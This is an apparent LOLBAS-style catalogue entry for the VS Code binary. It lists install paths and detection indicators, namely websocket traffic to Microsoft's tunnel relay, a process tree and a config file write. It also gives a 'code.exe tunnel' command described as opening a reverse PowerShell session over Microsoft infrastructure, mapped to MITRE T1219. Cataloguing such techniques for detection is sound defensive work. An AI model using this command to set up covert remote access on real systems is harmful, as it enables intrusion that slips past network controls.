VSCode binary, also portable (CLI) version
Paths:
- %LOCALAPPDATA%\Programs\Microsoft VS Code\Code.exe
- C:\Program Files\Microsoft VS Code\Code.exe
- C:\Program Files (x86)\Microsoft VS Code\Code.exe
Resources:
Detection:
- IOC: Websocket traffic to global.rel.tunnels.api.visualstudio.com
- IOC: Process tree: code.exe -> cmd.exe -> node.exe -> winpty-agent.exe
- IOC: File write of code_tunnel.json which is parametizable, but defaults to: %UserProfile%\.vscode-cli\code_tunnel.json
Execute
Starts a reverse PowerShell connection over global.rel.tunnels.api.visualstudio.com via websockets; command
code.exe tunnel --accept-server-license-terms --name "tunnel-name"
Usecase: Reverse PowerShell session over MS provided infrastructure.
Privileges required: User
OS: Windows 10, Windows 11
MITRE ATT&CK®: T1219